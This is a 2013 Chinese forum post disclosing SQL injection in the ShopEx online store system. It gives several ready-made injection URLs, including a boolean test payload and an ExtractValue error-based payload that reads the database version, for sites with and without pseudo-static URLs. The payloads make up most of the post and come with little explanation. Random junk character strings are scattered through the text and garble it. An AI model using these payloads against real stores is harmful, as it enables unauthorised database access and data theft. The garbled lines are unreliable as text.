注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
$ j0 [2 `# z& B
/ Z5 \, {3 `1 m2 t5 p6 p2 \好吧,我扯远了~~
8 M4 s0 J9 |" P* N其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~: @6 _6 w# j' B. q9 w* u, m8 E
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
1 _4 t. H8 h8 M# \; t4 F6 ]: X+ ^, V8 x8 x5 W) J
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
/ F* G2 ^: @1 B
( `- V# M: M- h7 ?; T- z; X: Phttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html( @2 V3 Y+ m/ e
/ O; J0 ]0 R. M8 S) N
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html+ l; c) e: n/ ]7 z2 A
/ E% ~, T4 P: U6 u0 ]6 y' fhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html- [& T5 g% A8 h( ?& i% P& O ?: L
+ L4 v- b. r! X! c1 a P$ d/ P: i) P , s8 g# ]6 o0 _/ e4 e7 P. x
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。5 U" e. j: {( L; O7 \4 J) C& B
如何注入就不多说了,10多年的东西了…不会也会了…
8 J# K7 @. O3 c& J9 n; ~2 h6 J: c4 q3 B0 r" `6 U% A5 I6 R
|
发表于 2013-2-4 16:20:04
收藏
支持
反对